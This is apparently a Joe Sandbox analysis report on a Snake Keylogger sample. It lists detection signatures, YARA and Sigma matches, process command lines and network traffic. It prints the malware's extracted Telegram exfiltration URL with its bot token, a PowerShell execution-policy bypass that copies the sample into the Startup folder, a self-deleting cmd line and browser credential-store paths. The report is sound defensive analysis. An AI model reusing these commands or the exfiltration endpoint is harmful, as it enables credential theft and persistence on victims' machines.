Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
upXUt2jZ0S.exe

Overview

General Information

Sample name:upXUt2jZ0S.exe
renamed because original name is a hash value
Original sample name:d53a9888b375983c277dc4471f3f37e258cca57a1e242784c4130b928127c254.exe
Analysis ID:1588147
MD5:857fc5f1da7948839d47abe238392ea2
SHA1:8cc415a58dae52f82befc0dafd947d519a4b1574
SHA256:d53a9888b375983c277dc4471f3f37e258cca57a1e242784c4130b928127c254
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Copy file to startup via Powershell
Yara detected Snake Keylogger
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates executable files without a name
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Self deletion via cmd or bat file
Tries to detect the country of the analysis system (by using the IP)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • upXUt2jZ0S.exe (PID: 2716 cmdline: "C:\Users\user\Desktop\upXUt2jZ0S.exe" MD5: 857FC5F1DA7948839D47ABE238392EA2)
    • powershell.exe (PID: 3964 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • upXUt2jZ0S.exe (PID: 1184 cmdline: "C:\Users\user\Desktop\upXUt2jZ0S.exe" MD5: 857FC5F1DA7948839D47ABE238392EA2)
      • cmd.exe (PID: 7692 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\upXUt2jZ0S.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 7740 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • svchost.exe (PID: 5136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • .exe (PID: 7472 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" MD5: 857FC5F1DA7948839D47ABE238392EA2)
    • powershell.exe (PID: 7504 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • .exe (PID: 7624 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe" MD5: 857FC5F1DA7948839D47ABE238392EA2)
      • WerFault.exe (PID: 7840 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1528 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6956304715:AAGEsKc2_BChUeZlL8X0MH3xZIsug2zAAIA/sendMessage?chat_id=6939220311", "Token": "6956304715:AAGEsKc2_BChUeZlL8X0MH3xZIsug2zAAIA", "Chat_id": "6939220311", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x149c0:$a1: get_encryptedPassword
      • 0x14cac:$a2: get_encryptedUsername
      • 0x147cc:$a3: get_timePasswordChanged
      • 0x148c7:$a4: get_passwordField
      • 0x149d6:$a5: set_encryptedPassword
      • 0x16024:$a7: get_logins
      • 0x15f87:$a10: KeyLoggerEventArgs
      • 0x15bf2:$a11: KeyLoggerEventArgsEventHandler
      00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x19968:$x1: $%SMTPDV$
      • 0x1834c:$x2: $#TheHashHere%&
      • 0x19910:$x3: %FTPDV$
      • 0x182ec:$x4: $%TelegramDv$
      • 0x15bf2:$x5: KeyLoggerEventArgs
      • 0x15f87:$x5: KeyLoggerEventArgs
      • 0x19934:$m2: Clipboard Logs ID
      • 0x19b72:$m2: Screenshot Logs ID
      • 0x19c82:$m2: keystroke Logs ID
      • 0x19f5c:$m3: SnakePW
      • 0x19b4a:$m4: \SnakeKeylogger\
      00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 14 entries
        SourceRuleDescriptionAuthorStrings
        0.2.upXUt2jZ0S.exe.4269610.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.upXUt2jZ0S.exe.4269610.2.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.upXUt2jZ0S.exe.4269610.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12dc0:$a1: get_encryptedPassword
            • 0x130ac:$a2: get_encryptedUsername
            • 0x12bcc:$a3: get_timePasswordChanged
            • 0x12cc7:$a4: get_passwordField
            • 0x12dd6:$a5: set_encryptedPassword
            • 0x14424:$a7: get_logins
            • 0x14387:$a10: KeyLoggerEventArgs
            • 0x13ff2:$a11: KeyLoggerEventArgsEventHandler
            0.2.upXUt2jZ0S.exe.4269610.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a72c:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x1995e:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19d91:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1add0:$a5: \Kometa\User Data\Default\Login Data
            0.2.upXUt2jZ0S.exe.4269610.2.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x1398e:$s1: UnHook
            • 0x13995:$s2: SetHook
            • 0x1399d:$s3: CallNextHook
            • 0x139aa:$s4: _hook
            Click to see the 34 entries

            System Summary

            barindex
            Source: Process startedAuthor: frack113: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upXUt2jZ0S.exe", ParentImage: C:\Users\user\Desktop\upXUt2jZ0S.exe, ParentProcessId: 2716, ParentProcessName: upXUt2jZ0S.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', ProcessId: 3964, ProcessName: powershell.exe
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3964, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3964, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upXUt2jZ0S.exe", ParentImage: C:\Users\user\Desktop\upXUt2jZ0S.exe, ParentProcessId: 2716, ParentProcessName: upXUt2jZ0S.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', ProcessId: 3964, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5136, ProcessName: svchost.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upXUt2jZ0S.exe", ParentImage: C:\Users\user\Desktop\upXUt2jZ0S.exe, ParentProcessId: 2716, ParentProcessName: upXUt2jZ0S.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe', ProcessId: 3964, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:55:54.942841+010028033053Unknown Traffic192.168.2.949794104.21.48.1443TCP
            2025-01-10T21:55:59.613581+010028033053Unknown Traffic192.168.2.949826104.21.48.1443TCP
            2025-01-10T21:56:00.946154+010028033053Unknown Traffic192.168.2.949836104.21.48.1443TCP
            2025-01-10T21:56:02.283538+010028033053Unknown Traffic192.168.2.949845104.21.48.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:55:49.925091+010028032742Potentially Bad Traffic192.168.2.949738132.226.247.7380TCP
            2025-01-10T21:55:54.012223+010028032742Potentially Bad Traffic192.168.2.949738132.226.247.7380TCP
            2025-01-10T21:55:54.378282+010028032742Potentially Bad Traffic192.168.2.949738132.226.247.7380TCP
            2025-01-10T21:55:56.675118+010028032742Potentially Bad Traffic192.168.2.949799132.226.247.7380TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6956304715:AAGEsKc2_BChUeZlL8X0MH3xZIsug2zAAIA/sendMessage?chat_id=6939220311", "Token": "6956304715:AAGEsKc2_BChUeZlL8X0MH3xZIsug2zAAIA", "Chat_id": "6939220311", "Version": "5.1"}
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeVirustotal: Detection: 61%Perma Link
            Source: upXUt2jZ0S.exeReversingLabs: Detection: 68%
            Source: upXUt2jZ0S.exeVirustotal: Detection: 61%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJoe Sandbox ML: detected
            Source: upXUt2jZ0S.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: upXUt2jZ0S.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.9:49761 version: TLS 1.0
            Source: upXUt2jZ0S.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: Microsoft.VisualBasic.pdbL0Tw# source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbi source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbGq source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.pdbPY4& source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbN source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdbd source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.PDB source: .exe, 0000000A.00000002.1795968848.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Xml.pdbd source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Xml.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbn^ source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Core.ni.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: upXUt2jZ0S.exe, 00000000.00000002.2592580416.0000000003181000.00000004.00000800.00020000.00000000.sdmp, .exe, 00000007.00000002.2610356599.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, .exe, 00000007.00000002.2594797460.0000000002D11000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: %%.pdb source: .exe, 0000000A.00000002.1795968848.00000000010F7000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.PDBl source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.ni.pdb source: WER65D3.tmp.dmp.16.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER65D3.tmp.dmp.16.dr

            Networking

            barindex
            Source: Yara matchFile source: 4.2.upXUt2jZ0S.exe.590000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.428a240.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.4269610.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.upXUt2jZ0S.exe.41d8770.4.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.9:60784 -> 162.159.36.2:53
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49738 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49799 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49794 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49836 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49826 -> 104.21.48.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49845 -> 104.21.48.1:443
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.9:49761 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
